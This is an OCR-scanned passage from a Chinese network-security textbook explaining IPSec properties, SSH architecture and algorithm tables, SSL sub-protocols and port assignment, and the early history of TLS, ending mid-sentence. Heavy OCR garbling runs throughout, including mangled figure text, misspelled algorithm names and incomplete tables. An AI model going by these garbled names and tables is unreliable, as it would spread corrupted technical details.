IPSec 协议 不 是 一 个 单独 的 协议 ， 它 给 出 了 应 用 于 人 P 层 上 网 络 数据 安全 的 一 整套 体系 
结构 ， 包 括 认证 头 (Authentication Header，AH)、 封 装 安全 载荷 (Encapsulating Security 
Payload，ESP) 协 议 、 互 联网 密 钥 交换 (Intemet Key Exchange，IKE) 协 议和 利用 于 网 络 认证 
及 加 密 的 一 些 算法 等 。IPSec 规定 了 如 何在 对 等 层 之 间 选 择 安全 协议 、 确 定安 全 算法 和 密 
钥 交 换 ， 向 上 提供 了 访问 控制 、 数 据 源 认证 、 数 据 加 密 等 网 络 安全 服务 。 

IPSec 的 安全 特性 主要 有 以 下 几 点 。 

1) 不 可 否认 性 

“不 可 否认 性 ”可 以 证 实 消息 发 送 方 是 唯一 可 能 的 发 送 者 ， 发 送 者 不 能 否认 发 送 过 消 
息 。“ 不 可 否认 性 ”是 采用 公 钥 技术 的 一 个 特征 ， 当 使 用 公 钥 技术 时 ， 发 送 方 用 私 钥 产 生 
一 个 数字 签名 并 和 消息 一 起 发 送 ， 接 收 方 用 发 送 者 的 公 钥 来 验证 数字 签名 。 由 于 在 理论 上 
只 有 发 送 者 才 拥 有 私 钥 ， 也 只 有 发 送 者 才 可 能 产生 该 数字 签名 ， 所 以 只 要 数字 签名 通过 验 
证 ， 发 送 者 就 不 能 否认 曾 发 送 过 该 消息 。 但 “不 可 否认 性 ”不 是 基于 认证 的 共享 密 钥 技术 
的 特性 的 特征 ， 因 为 在 基于 认证 的 共享 密 钥 技 术 中 ， 发 送 方 和 接收 方 掌握 相同 的 密 钥 。 

2)” 反 重播 性 

“ 反 重播 性 ”可 以 确保 每 个 IP 包 的 唯一 性 ， 以 保证 信息 万 一 被 截取 复制 后 ， 不 能 再 
被 重新 利用 ， 重 新 传输 回 目的 地 址 。 该 特性 可 以 防止 攻击 者 截取 破译 信息 后 ， 再 用 相同 的 
信息 包 非 法 冒 取 访 问 权 (即使 这 种 冒 取 行 为 发 生 在 数 月 之 后 )。 

3) ”数据 完整 性 

防止 传输 过 程 中 数据 被 算 改 ， 确 保 发 出 数据 和 接收 数据 的 一 致 性 。IPSec 利用 Hash 函 
数 为 每 个 数据 包产 生 一 个 加 密 校 验 和 ， 接 收 方 在 打开 包 前 先 计 算 校 验 和 ， 若 包 被 算 改 导致 
校 验 和 不 相符 ， 数 据 包 即 被 丢弃 。 

4) ”数据 可 靠 性 (加 密 ) 

在 传输 前 ， 对 数据 进行 加 密 ， 可 以 保证 在 传输 过 程 中 ， 即 使 数据 包 被 截取 ， 信 息 也 无 
法 被 读 。 该 特性 在 IPSec 中 为 可 选项 ， 与 IPSec 策略 的 具体 设置 相关 。 

5) ”认证 数据 源 

发 送信 任 状 ， 由 接收 方 验证 信任 状 的 合法 性 ， 只 有 通过 认证 的 系统 才 可 以 建立 通信 
连接 。 
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2. IPSec 协议 的 优点 


通常 IPSec 提供 的 保护 需要 对 系统 做 一 定 的 修改 。 但 是 IPSec 在 IP 传输 层 即 第 三 层 的 
“策略 执行 ”(Strategic Implementation) 几 乎 不 需要 什么 额外 的 开销 就 可 以 实现 为 绝 大 多 数 

应 用 系统 、 服 务 和 为 上 层 协 议 提供 较 高 级 别 的 保护 ， 为 现 有 的 应 用 系统 和 操作 系统 配置 
IPSec 几乎 不 需要 做 什么 修改 ， 安 全 策略 可 以 在 Active Directory 里 集中 定义 也 可 以 在 某 台 
主机 上 进行 本 地 化 管理 。 

IPSec 策略 在 ISO 参考 模型 第 三 层 即 网 络 层 上 实施 安全 保护 ， 其 范围 几乎 涵盖 了 
TCP/P 协议 簇 中 所 有 卫 协议 和 上 层 协 议 ， 如 TCP、UDP、ICMP、Raw( 第 255 号 协议 )， 
甚至 包括 在 网 络 层 发 送 数 据 的 客户 自 定义 协议 。 在 第 三 层 上 提供 数据 安全 保护 的 主要 优点 
就 是 所 有 使 用 人 P 协议 进行 数据 传输 的 应 用 系统 和 服务 都 可 以 使 用 IPSec， 而 不 必 对 这 些 应 
用 系统 和 服务 本 身 做 任何 修改 。 

运作 于 第 三 层 以 上 的 其 他 一 些 安全 机 制 ， 如 安全 套 接 层 SSL， 仅 对 知道 如 何 使 用 SSL 
的 应 用 系统 (如 Web 浏览 器 ) 提 供 保护 ， 这 极 大 地 限制 了 SSL 的 应 用 范围 ， 而 运作 于 第 三 
层 以 下 的 安全 机 制 ， 如 链 路 层 加 密 ， 通 常 只 保护 了 特定 链 路 间 的 数据 传输 ， 而 无 法 做 到 在 
数据 路 径 所 经 过 的 所 有 链 路 间 提 供 安全 保护 ， 这 使 得 链 路 层 加 密 无 法 适用 于 Intemet 或 路 
由 Internet 方案 中 端 对 端的 数据 保护 。 


2.2.3 ”传输 层 安全 


传输 层 安全 措施 主要 取决 于 具体 的 协议 。 传 输 层 主 要 包括 传输 控制 协议 (TCP) 和 用 户 
数据 报 协议 (UDP)。TCP 是 一 个 面向 连接 的 协议 ， 保 证 数据 的 可 靠 性 。TCP 用 于 多 数 的 互 
联网 服务 ， 如 HITP、FTP 和 SMTP。 最 常见 的 是 Netscape 通信 公司 设计 的 安全 套 接 层 协 
议 (Secure Sockets Layer，SSL)，SSL 结构 如 图 2-5 所 示 。 


下 年 澳 入 到 开 基 SMTP 


SSL 协商 层 


SSL 记录 层 


图 2-5 SSL 结构 图 

UDP 是 一 个 非 面向 连接 的 协议 ， 常 用 于 广播 类 协议 ， 如 音频 及 视频 数据 流 。 比 TCP 
快 且 占用 带宽 少 ， 但 不 保证 可 靠 传 输 。 网 上 启动 装置 常用 的 简单 文件 传输 协议 (Trivial File 
Transfer Protocol，TFTP) 是 基于 UDP 的 应 用 层 协议 ， 比 FTP 简单 。 
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传输 层 安 全 (Transport Layer Security，TLS) 协 议 在 TCP 的 顶部 ， 提 供 了 如 身份 验证 、 
完整 性 检验 以 及 保密 性 保证 的 安全 服务 。TLS 需要 一 个 与 连接 相 适 应 的 环境 ， 也 是 基于 可 
靠 的 传输 控制 协议 TCP 的 。 由 于 安全 机 制 与 特定 的 传输 协议 有 关 ， 因 此 ， 密 钥 管理 的 安 
全 服务 可 以 为 各 种 传输 协议 重复 使 用 。 

传输 层 安 全 协议 包括 SSH 协议 、SSL 协议 和 PCT 协议 ， 以 及 统一 的 标准 TLS。 本 节 
重点 介绍 这 些 协议 。 

1. SSH 协议 


SSH 是 Secure Shell 的 缩写 。 从 字面 上 理解 就 是 安全 的 shell。 利 用 它 可 以 安全 地 登录 
到 远程 系统 ， 执 行 远程 系统 上 的 命令 或 从 一 台 机 器 拷贝 文件 。SSH 可 以 在 不 安全 的 通道 
上 建立 一 条 安全 的 认证 和 通信 通道 ， 因 此 ， 它 的 主要 目的 是 为 了 完全 替代 伯克利 的 
r-tools， 包 括 rlogin、rsh、rcp 和 rdist。 在 许多 情况 下 ， 它 还 可 以 用 来 代 蔡 Telnet。 另 外 ， 
利用 SSH 的 特性 ，X11 和 原始 的 TCP/IP 可 以 进行 安全 的 连接 。 

SSH 主要 由 芬兰 赫尔辛基 大 学 的 Tatu Ylonen 开发 。 现 在 ， 除 了 由 他 本 人 创办 的 SSH 
Communication Security 公司 开发 的 SSH 开发 SSH 外 ，OpenSHH 组 织 也 开发 了 免费 使 用 
的 OpenSSH 软件 供 大 家 使 用 。SSH Communication Security 公司 开发 的 SSH 目前 最 新 的 
版 本 是 3.1.2， 它 分 为 免费 版 和 商业 版 。 免 费 版 可 以 从 www.ssh.com 下 载 ， 提 供给 大 学 和 
非 商业 用 途 使 用 ， 商 业 版 需要 购买 版 权 。OpenSSH 目前 的 最 新 版 本 是 3.2.3， 可 以 从 
www.openssh.org 了 解 到 其 最 新 的 信息 。 

SSH 协议 有 版 本 1(SSHv1) 和 版 本 2(SSHv2)。 需 要 注意 的 是 ， 这 两 个 版 本 之 间 是 不 兼 
容 的 。SSHv1 又 有 两 个 变种 : SSHv1.3 和 SSHv1.5。 它 们 都 使 用 了 不 对 称 的 加 密 算 法 RSA 
进行 密 钥 协商 ， 然 后 ， 用 简单 的 对 称 加 密 算法 3DES 和 Blowfish 进行 数据 加 密 。SSHv1 采 
用 了 简单 的 CRC 来 保护 数据 的 完整 性 。 熟 悉 加 密 法 的 读者 知道 ， 用 CRC 来 保护 数据 的 完 
整 性 是 很 不 够 的 。 只 要 同时 改变 同一 个 数据 包 的 两 个 bit， 这 个 算法 就 完全 失效 了 。SSHv2 
的 主要 目的 是 去 掉 SSHv1 的 RSA 专利 许可 和 改进 CRC 带 来 的 数据 完整 性 保护 问题 。 通 
过 使 用 非 对 称 的 DSA 和 Diffie-Hellman 算法 ，SSHv2 完全 没有 专利 问题 。CRC 数据 验证 
保护 差 的 问题 ， 也 通过 使 用 HMAC 验证 算法 得 到 了 解决 。 另 外 ，SSHv2 在 加 密 算法 的 选 
择 上 ， 也 提供 了 更 大 的 灵活 性 。SSH 利用 了 通用 的 传输 层 安 全 协议 。 这 个 协议 可 以 用 在 
TCP 协议 上 ， 也 可 以 用 在 其 他 的 可 靠 传输 协议 上 。 当 用 在 TCP/IP 协议 上 时 ， 服 务 器 通常 
在 22 号 TCP 端口 侦 听 。 这 个 端口 已 经 在 IANA 注册 ， 并 正式 分 配给 SSH 协议 使 用 。 简 
单 来 讲 ，SSH 协议 同时 支持 主机 认证 和 用 户 认 证 ， 还 支持 数据 压缩 、 数 据 保密 和 数据 完整 
性 保护 。 从 协议 的 一 开始 ， 客 户 机 发 送 认 证 请 求 给 服务 器 。 服 务 器 返回 服务 器 主机 密 钥 和 
服务 器 的 公共 密 钥 。 这 里 ， 发 回 主机 密 钥 的 目的 是 确保 客户 机 连接 到 了 真正 的 服务 器 ， 这 
样 可 以 防止 中 间 人 攻击 。 当 然 ， 这 需要 客户 机 知道 服务 器 的 主机 公开 密 钥 ， 才 能 进行 比 
较 。 而 发 送 服务 器 密 钥 的 目的 是 为 了 保证 在 主机 密 钥 已 经 泄露 的 情况 下 ， 仍 然 能 保证 通信 
安全 。 因 此 ， 服 务 器 密 钥 是 不 能 保存 在 主机 上 的 ， 需 要 不 断 进行 更 新 。 一 般 来 讲 ， 客 户 机 
可 以 接受 自己 不 认识 的 服务 器 主机 密 钥 ， 并 会 把 这 个 密 钥 保 存在 数据 库 中 。 但 是 ， 在 高 度 
机 密 的 环境 中 ， 客 户 机 不 应 该 接受 不 认识 的 主机 密 钥 。 如 果 客 户 机 接收 到 了 主机 密 钥 ， 它 
会 产生 一 个 随机 数 作为 会 话 密 铀 。 用 服务 器 的 主机 密 钥 把 会 话 密 钥 加 密 ， 发 送 给 服务 器 ， 
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然后 ， 双 方 就 可 以 用 密 钥 进行 加 密会 话 了 。 

在 多 数 情 况 下 ， 除 了 进行 上 面 的 机 器 之 间 的 验证 之 外 ， 还 需要 进行 用 户 认 证 。 相 应 的 
交换 是 从 用 户 发 起 的 ， 它 发 送 一 个 认证 请 求 给 服务 器 。 认 证 请 求 中 ， 包 含 了 用 户 的 用 户 
名 ， 根 据 认 证 方法 的 不 同 ， 客 户 机 和 服务 器 的 会 话 内容 不 太一 样 。 如 在 F-Secure SSH 1.0 
版 中 就 有 两 种 认证 方法 。 

(1) 用 口令 认证 。 用 户口 令 在 通道 中 传送 ， 由 SSH 进行 透明 加 密 。 

(2) 用 RSA 认证 。 服 务 器 以 用 户 的 公开 密 钥 来 加 密 一 个 随机 数 ， 然 后 发 送 给 客户 ， 
让 他 解密 。 在 这 种 情况 下 ， 服 务 器 必须 访问 保存 着 用 户 公开 密 钥 的 数据 库 。 只 有 在 用 户 知 
道 自己 的 私有 密 钥 的 情况 下 才能 解 开 这 个 随机 数 。 为 了 验证 自己 ， 用 户 必须 把 解 开 的 随机 
数 用 一 种 加 密 方法 加 密 后 ， 发 送 回 服务 器 。 

SSH 协议 框架 实际 上 由 三 个 子 协议 组 成 : 传输 层 协议 、 认 证 协议 和 连接 协议 。 读 者 可 
以 从 www.ssh.com 网 站 下 载 三 个 协议 的 文本 。 它 的 框架 则 由 另外 一 个 文本 描述 SSH 传输 
层 协 议 (The Transport Layer Protocol) 提 供 服 务 器 主机 认证 ， 提 供 对 数据 机 密 性 、 数 据 完整 
性 的 支持 ，SSH 用 户 认证 协议 (The User Authentication Protocol) 则 为 服务 器 提供 用 户 的 身 
份 认 证 ; SSH 连接 协议 (The Connection Protocol) 将 加 密 的 信息 隧道 复 用 成 若干 个 逻辑 通 
道 ， 提 供给 高 层 的 应 用 协议 使 用 ， 各 种 高 层 应 用 协议 可 以 相对 独立 于 SSH 基本 体系 之 
外 ， 并 依靠 这 个 基本 框架 ， 通 过 连接 协议 使 用 SSH 的 安全 控制 。 下 面 对 这 三 个 子 协 议 做 
进一步 的 介绍 。 

SSH 传输 层 协 议 提 供 加 密 主 机 认证 、 数 据 保 密 性 和 数据 完整 性 保护 。 这 个 协议 中 不 提 
供用 户 认证 。 前 面 也 已 经 提 到 ，SSH 认证 协议 在 SSH 传输 协议 之 上 ， 如 果 服 务 进程 需要 
的 话 ， 可 以 由 它 来 提供 用 户 认 证 。 

SSH 传输 层 协议 支持 多 种 不 同 的 密 钥 交换 ， 秘 密 密 钥 和 公开 密 钥 ， 一 些 算法 的 协商 都 
是 在 连接 过 程 中 完成 的 ， 且 支持 哈 希 算法 和 消息 认证 算法 。 有 些 算法 是 协议 中 要 求 一 定 要 
实现 的 ， 而 有 一 些 算 法 虽然 也 写 进 协议 中 了 ， 但 是 可 以 实现 ， 也 可 以 不 实现 。 另 外 ， 这 个 
协议 还 考虑 到 ， 在 实际 的 应 用 当中 ， 有 些 单位 可 能 会 希望 使 用 自己 专用 的 算法 。 这 涉及 如 
何 分 配 算法 标示 ， 保 证 通信 双方 之 间 能 分 辨 的 问题 。 原 则 上 来 讲 ， 任 何人 都 可 以 通过 
name@domain 的 格式 定义 自己 的 SSH 算法 。 在 这 个 格式 中 ，Name 标示 算法 的 名 字 ， 
domain 标示 公司 的 域名 。 

当 用 SSH 协议 来 建立 客户 机 和 服务 器 之 间 的 TCP/IP 连接 时 ， 双 方 首先 要 交换 标示 字 
符 串 ， 这 些 标示 字符 串 中 包含 着 SSH 协议 和 软件 的 版 本 号 。 然 后 开始 密 钥 交换 。 所 有 的 
SSH 消息 都 要 遵守 规定 的 二 进 制 封装 协议 。 当 协议 开始 执行 时 ， 还 没有 特定 的 数据 压缩 、 
加 密 和 消息 验证 算法 ， 所 以 也 不 会 使 用 。 而 在 密 钥 交换 过 程 中 ， 会 协商 和 选择 并 在 随后 的 
过 程 中 使 用 数据 压缩 、 加 密 和 消息 验证 算法 。 现 将 已 经 定义 好 的 SSH 数据 压缩 、 加 密 、 
消息 验证 和 密 钥 交换 算法 分 别 列 在 表 2-2 一 表 2-4 中 。 


表 2-2 SSH2.0 支持 的 数据 压缩 算法 


None 不 加 密 必 选 


Zlib GNU ZLIB 压缩 :第 六 级 可 选 
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表 2-3 SSH2.0 支持 的 加 密 算 法 


值 描 述 要 求 
None 不 加 密 可 选 (不 建议 ) 
3des-cbc 三 密 钥 DES，CBC 模式 必 选 
blowfish-cbc Blowfish 算法 ，CBC 模式 建议 
twofish256-cbc Twofish 算法 ，CBC 模式 ，256 位 密 钥 | 可 选 
twofish-cbc Twofish256-cbe 的 别名 (历史 原因 ) 可 选 
twofish192-cbc Twofish 算法 ，CBC 模式 ，192 位 密 钥 | 可 选 
twofish128-cbc Twofish 算法 ，CBC 模式 ，128 位 密 钥 | 建议 
aes256-cbc AES 算法 ，CBC 模式 ，256 位 密 钥 可 选 


aes192-cbc AES 算法 ，CBC 模式 ，192 位 密 钥 可 选 
aes128-cbc AES 算法 ，CBC 模式 ，128 位 密 钥 建议 
sepent256-cbe 可 多 
serpent192-cbe 可 选 
serpent128-cbe 本 和 


ee 可 选 
Idea-cbe IDEA 算法 ，CBC 模式 可 选 
Cast128-cbe 可 选 


表 2-4 SSH 2.0 支持 的 消息 验证 算法 


值 


None 没有 消息 验证 
Hmac-md5 HMAC-MD5( 摘 要 长 度 = 密 钥 长 度 =16) 
Hmac-md5-96 HMAC-MDS5 的 前 96 位 


Hmac-shal HMAC-SHA1( 摘 要 长 度 = 密 钥 长 度 =20) 
Hmac-shal-96 HMAC-SHA1 的 前 96 位 


GNU ZLIB 压缩 算法 由 RFC1950 和 RFC1951 说 明 。 在 两 个 通信 方向 上 ， 压 缩 是 相互 
独立 的 ， 不 同 的 方向 可 以 使 用 不 同 的 压缩 算法 。 

在 密 钥 交换 过 程 中 ， 还 会 协商 出 一 个 加 密 算法 和 相应 的 加 密 密 钥 。 当 加 密 算法 开始 起 
作用 后 ， 每 个 消息 中 特定 的 域 就 会 用 这 种 加 密 算法 和 相应 的 密 钥 进行 加 密 。 因 此 ， 一 个 方 
向 上 的 所 有 消息 可 以 被 看 成 是 一 个 数据 流 ， 初 始 向 量 从 一 个 消息 的 尾部 传递 给 下 一 个 消息 
的 起 始 部 分 。 两 个 方向 上 ， 加 密 是 相互 独立 的 ， 一 般 来 讲 ， 它 们 使 用 不 同 的 加 密 密 钥 ， 也 
可 以 使 用 不 同 的 加 密 算法 。 


3 注意 : ”只 有 Triple-DES 才 是 必须 实现 的 算法 。 “none” 标 示 不 进行 加 密 ， 因 此 ， 不 
能 提供 数据 保密 性 ， 所 以 不 建议 使 用 。 


在 每 个 消息 中 ， 都 会 增加 一 个 消息 验证 码 来 进行 数据 的 验证 和 完整 性 保护 ， 这 个 消息 


第 2 章 网 络 安全 基础 41 


验证 码 由 共享 密 钥 、32 位 序列 号 和 消息 的 实际 内 容 一 起 计算 得 出 。 通 信 的 双方 不 需要 传 
递 序列 号 ， 但 是 这 个 序列 号 在 消息 验证 码 计算 和 验证 的 过 程 中 会 用 到 ， 这 样 可 以 保证 消息 
没有 丢失 ， 并 防止 消息 到 达 的 顺序 出 现 混乱 。 第 一 个 消息 的 序列 号 为 0， 每 发 送 一 个 消 
息 ， 序 列 号 加 1。 作 为 SSH 消息 的 最 后 一 部 分 ， 消 息 验 证 码 不 会 被 加 密 。 消 息 验证 码 的 长 
度 依赖 于 所 使 用 的 算法 。 同 样 ， 消 息 验证 算法 和 相应 的 密 钥 在 两 个 方向 上 可 能 不 同 ， 它 们 
在 密 钥 交 换 过 程 中 协商 确定 。 

目前 SSH 2.0 只 定义 了 Diffie-Hellman 交换 算法 ， 如 表 2-5 所 示 。 


表 2-5 SSH 2.0 支持 的 密 钥 交换 算法 


值 
Diffie-hellman-groupl-shal 


SSH 2.0 几乎 支持 所 有 的 公开 密 钥 格式 、 编 码 和 算法 。 定 义 公开 密 钥 的 类 型 涉及 以 下 
几 个 方面 。 

e ” 密 钥 格式 ， 密 钥 的 编码 方式 和 认证 的 表达 方式 ; 

@ ”签名 和 加 密 算法 : 有些 密 钥 的 类 型 可 能 不 能 同时 支持 签名 和 加 密 ; 

@ ”签名 后 或 加 密 后 的 数据 编码 。 

SSH 2.0 已 经 定义 了 如 表 2-6 所 示 的 公开 密 钥 和 认证 格式 。 


表 2-6 SSH 2.0 支持 的 公开 密 钥 格式 


描 述 
Diffie-Hellman 交换 ， 第 一 组 


值 描 述 要 求 
Ssh-dss 简单 DSS 必须 
Ssh-rsa 简单 RSA 建议 
X509v3-sign-rsa X.509 认证 ，RSA 密 钥 可 选 
X509v3-sign-dss, X.509 认证 ，DSS 密 钥 可 选 
Spki-sign-rsa SPKI 认证 ，RSA 密 钥 可 选 
Spki-sign-dss SPKI 认证 ，DSS 密 钥 可 选 
pgp-sign-rsa OpenPGP 认证 ，RSA 密 钥 可 选 
pgp-sign-dss OpenPGP 认证 ，DSS 密 钥 可 选 


简单 来 讲 ，SSH 传输 层 协议 需要 经 过 下 列 三 个 步骤 。 

(1) 密 钥 交换 从 双方 开始 发 送 自己 能 支持 的 算法 (压缩 、 加 密 、 验 证 )。 根 据 收 到 的 对 
方 的 算法 进一步 协商 出 一 致 的 算法 。 

(2) 进行 密 钥 交换 (如 Diffie-Hellman)。 

(3) 开始 服务 请 求 。 

最 后 一 步 是 在 SSH 传输 层 协议 执行 快 完成 时 执行 的 ， 客 户 端 通过 发 送 
SSH SERVICE REQUEST 消息 给 服务 器 端 。 目 前 已 经 定义 的 服务 有 两 种 : ssh-userauth 和 
ssh-connection。 如 果 服 务 器 端 支持 这 里 提出 的 服务 并 且 允 许 客户 端 使 用 这 个 服务 ， 就 会 返 
回 一 个 SSH SERVICE ACCEPT 消息 。 一 旦 选 定 了 特定 的 服务 ， 再 发 送 
SSH SERVICE DATA 消息 给 对 方 。 当 双方 都 同意 关闭 连接 时 ， 会 发 送 SSH_ 
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SREAM _CLOSE 消息 给 对 方 。 这 个 协议 过 程 就 结束 了 。 

SSH 认证 协议 运行 在 SSH 传输 层 协议 上 ， 提 供用 户 认证 服务 。 和 它 相应 的 服务 名 是 
ssh-userauth， 这 个 服务 刚刚 在 前 面 讲 过 。 简 单 来 说 ， 用 户 认 证 是 这 样 工作 的 : 客户 端 首先 
报告 服务 站 名 和 访问 服务 的 用 户 名 ; 接 下 来 ， 服 务 器 端 返回 和 这 种 服务 相对 应 的 几 种 认证 
方法 ;客户 端 可 以 选择 其 中 一 种 认证 方法 ， 发 送 给 服务 器 端 相 应 的 认证 请 求 。 双 方 之 间 的 
对 话 一 直 这 样 进行 下 去 ， 直 到 服务 器 授予 用 户 访问 的 权利 或 拒绝 用 户 访问 为 止 。 

和 加 密 算法 一 样 ，SSH 协议 中 已 经 定义 了 一 些 用 户 认证 方法 ， 也 可 以 用 
name@domain 的 格式 增加 新 的 用 户 认 证 方法 。 通 过 这 种 方式 ， 有 需要 的 单位 可 以 使 用 自 
己 的 认证 方法 。SSH 认证 协议 中 已 经 定义 的 认证 方法 如 表 2-7 所 示 。 

表 2-7 SSH 支持 的 认证 方法 
认证 方法 
口令 认证 
公开 密 钥 认 证 
基于 客户 机 的 认证 


在 认证 时 ， 客 户 端 发 送 SSH_MSG_USERAUTH _ REQUEST 消息， 后 面 跟随 下 列 


Password 


@ 用户 名 ; 

@ ”服务 名 ; 

@ 方法 名 ; 

@ ”其 他 和 方法 相关 的 域 。 

其 中 方法 名 就 是 表 2-7 中 的 值 。 服 务 器 端 会 返回 SSH MSG USERAUTH FAILURE 
表示 认证 失败 ， 或 返回 SSH_MSG _USERAUTH_SUCCESS 表示 认证 成 功 。 如 果 服 务 器 返 
回 SSH MSG USERAUTH FAILURE， 则 客户 端 可 以 继续 选择 其 他 的 认证 方式 ， 进 行 其 
他 的 认证 。 如 果 服 务 器 端 发 送 SSH MSG _USERAUTH _ SUCCESS 表明 认证 成 功 。 那 么 ， 
实际 上 认证 过 程 已 经 结束 ， 后 面 发 送 的 消息 就 可 以 忽略 了 。 

SSH 连接 协议 运行 在 SSH 传输 层 协 议和 SSH 用 户 认 证 协议 上 ， 它 提供 交互 的 登录 会 
话 、 执 行 远程 命令 、 转 发 TCP/IP 连接 和 转发 X11 连接 。 这 个 协议 的 服务 名 是 ssh- 
connection， 由 于 连接 协议 的 目的 是 把 已 经 加 密 的 隧道 提供 给 多 个 应 用 程序 复 用 ， 因 此 ， 
它 需要 一 个 能 区 分 不 同 应 用 程序 的 方法 。SSH 连接 协议 引入 了 通道 (Channel) 的 机 制 。 所 有 
的 终端 会 话 、 转 接连 接 都 是 通道 ， 多 个 通道 被 复 用 成 一 个 连接 。 对 于 每 一 端 来 说 ， 通 道 用 
数字 来 标识 。 在 两 端 标明 同一 个 通道 的 数字 可 能 不 同 。 当 一 个 通道 打开 时 ， 请 求 打开 通道 
的 消息 同时 会 包含 发 送 方 的 通道 号 。 接 收 方 也 给 新 的 通道 分 配 一 个 自己 的 通道 号 。 在 以 后 
的 通信 过 程 中 ， 只 要 让 这 两 个 通道 号 一 一 对 应 就 可 以 了 。 如 果 向 对 方 请 求 打 开 一 个 通道 ， 
需要 发 送 一 个 SSH MSG_CHANNEL OPEN 消息 ， 同 时 还 要 告诉 对 方 自己 的 通道 号 和 初 
始 的 窗口 大 小 ， 因 此 会 有 如 下 内 容 : 

® SSH MSG CHANNEL OPEN 

e@ ”通道 类 型 ; 
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发 送 方 通道 号 ; 
初始 窗口 大 小 ; 
最 大 包 大 小 ; 
和 通道 类 型 相关 的 其 他 内 容 。 

远程 端 会 返回 一 个 消息 ， 表 明 这 个 通道 是 否 可 以 打开 。 根 据 实际 情况 不 同 ， 可 能 会 返 
回 SSH MSG CHANNEL OPEN_CONFIRMATION 消息 表明 通道 已 经 成 功 打 开 ; 返回 
SSH_MSG CHANNEL OPEN _ FAILURE 表明 通道 打开 失败 。 通 道 打开 之 后 ， 就 可 以 进行 
数据 传输 了 。 

当 通 信 的 一 方 不 再 需要 进行 数据 传输 时 ， 就 应 该 发 出 SSH_MSG_CHANNEL EOF 消 
息 ， 消 息 中 包含 需要 关闭 的 通道 号 。 当 任何 一 方 决定 关闭 通道 时 ， 会 发 送 
SSH MSG CHANNEL CLOSE 消息 。 另 一 方 在 接收 到 这 个 消息 之 后 ， 也 会 发 送 
SSH_MSG CHANNEL CLOSE 消息 。 如 果 接 收 到 双方 都 同意 关闭 通道 的 消息 ， 则 通道 会 
被 关闭 。 

2. SSL 协议 


安全 套 接 层 (Security Socket Layer，SSL) 由 Netscape 通信 公司 提出 ， 它 用 来 增强 BSD 
Socket 的 安全 性 。SSL 协议 的 1.0 版 只 在 Netscape 内 部 使 用 。 直 到 2.0 版 ，SSL 协议 才 捆 
绑 到 Netscape 的 浏览 器 Navigator 1 和 Navigator 2 中 。 后 来 ，SSL 2.0 成 为 用 来 保护 HTTP 
通信 的 标准 。 但 是 ，SSL 2.0 无 论 在 加 密 学 的 安全 上 ， 还 是 在 功能 上 ， 都 有 一 些 局 限 性 。 
因此 ， 在 大 家 的 帮助 下 ， 协 议 被 升级 到 SSL 3.0。 这 个 新 的 SSL 版 本 于 1995 年 12 月 正式 
发 布 。 最 新 的 SSL 3.0 文档 于 1996 年 11 月 发 布 。 目 前 ， 大 多 数 的 实现 都 符合 2.0 或 3.0 版 。 

SSL 在 系统 结构 中 的 位 置 如 图 2-6 所 示 。 需 要 注意 的 是 ，SSL 运行 在 可 靠 的 传输 协议 
之 上 ， 如 TCP/IP 之 上 的 应 用 程序 。 当 然 ， 传 输 层 安全 协议 不 能 保护 基于 流量 分 析 的 攻 
击 ， 因 为 卫 的 头 部 信息 还 是 暴露 在 外 面 的 。 


应 用 程序 应 用 程序 


SSL 握手 协议 9355 本 赴任 六 | 


SSL 记录 协议 SSL 记录 协议 | 


TCP/IP Pm TCP/IP | 


图 2-6 SSL 在 系统 结构 中 的 位 置 
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为 了 利用 SSL， 客 户 端 和 服务 器 端 都 需要 知道 对 方正 在 使 用 SSL。 一 般 来 说 解决 这 个 
问题 有 三 种 办 法 : 
e@ ”第 一 种 办 法 是 用 IANA 保留 的 专用 端口 号 。 在 这 种 情况 下 ， 需 要 给 每 种 支持 SSL 
的 应 用 协议 分 配 独立 的 端口 号 。 
第 二 种 办 法 是 仍然 使 用 应 用 协议 正常 的 端口 号 ， 在 应 用 协议 中 协商 安全 选项 。 
第 三 种 办 法 是 在 正常 的 TCP/IP 连接 建立 阶段 ， 用 TCP 选项 来 协商 使 用 安全 
协议 。 
第 三 种 办 法 很 好 ， 但 是 ， 实 现 起 来 比较 困难 。 第 二 种 办 法 则 需要 修改 原来 的 应 用 协 
议 。 所 以 ， 实 际 实现 中 采用 第 一 种 办 法 ， 给 不 同 的 应 用 协议 保留 独立 的 端口 号 ， 并 由 
IANA 进行 分 配 。IANA 正式 分 配 的 端口 号 列 在 表 2-8 中 。 


表 2-8 给 支持 SSL 的 应 用 协议 分 配 的 端口 号 


支持 SSL 的 HTTP 协议 
支持 SSL 的 SMTP 协议 


在 Intemet 社区 中 ， 也 有 一 些 应 用 协议 的 端口 号 已 经 被 广泛 接受 和 使 用 ， 但 还 没有 得 
到 IANA 的 分 配 。 这 些 应 用 协议 的 端口 号 列 在 表 2-9 中 。 


表 2-9 已 经 在 使 用 的 应 用 协议 端口 号 


支持 SSL 的 FTP 数据 传输 
支持 SSL 的 FTP 控制 


支持 SSL 的 IMAP4 协议 


telnets 支持 SSL 的 Telnet 协议 
ircs 支持 SSL 的 IRC 协议 


SSL 协议 由 两 个 子 协议 组 成 ，SSL 记录 协议 和 SSL 握手 协议 。SSL 记录 协议 用 来 封装 
不 同 的 高 层 协议 ， 它 提供 数据 验证 、 保 密 性 和 完整 性 服务 ， 同 时 用 来 防止 重复 攻击 。 所 
以 ， 这 里 的 记录 ， 实 际 上 指 的 是 数据 包 。SSL 记录 协议 封装 的 上 层 协议 可 以 有 多 种 。 其 中 
之 一 是 SSL 握手 协议 。SSL 握手 协议 让 客户 端 和 服务 器 端 在 传输 数据 之 前 可 以 彼此 验 
证 ， 并 且 进 行 数据 加 密 方 法 和 加 密 密 钥 的 协商 。 在 协商 好 这 些 加 密 参数 之 后 就 可 以 通过 
SSL 记录 协议 来 传送 敏感 数据 。 前 面 我 们 提 到 ，SSH 用 了 4 个 文档 ， 分 别 对 协议 的 不 同 组 
成 部 分 进行 说 明 。SSL 和 SSH 不 同 ， 它 的 文档 说 明 只 有 一 个 文件 ， 同 时 说 明了 这 两 个 子 
协议 。 
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3. 传输 层 安全 协议 


1996 年 ，IETF 组 织 了 一 个 传输 层 安全 工作 组 。 这 个 工作 组 的 目标 是 在 现 有 的 
SSL(2.0 和 3.0)、PCR(1.0) 和 SSH(2.0) 的 基础 上 ， 给 Internet 编写 出 标准 的 传输 层 安全 协 
议 。 编 写 传输 层 安 全 协议 的 目的 是 不 要 再 出 现 新 的 协议 ， 避 免 造 成 混淆 ， 并 希望 能 够 提供 
扩充 性 和 兼容 性 。 

在 1996 年 San Jose 的 IETF 会 议 之 前 不 入， 传输 层 安全 工作 组 以 草案 的 形式 发 表 了 第 
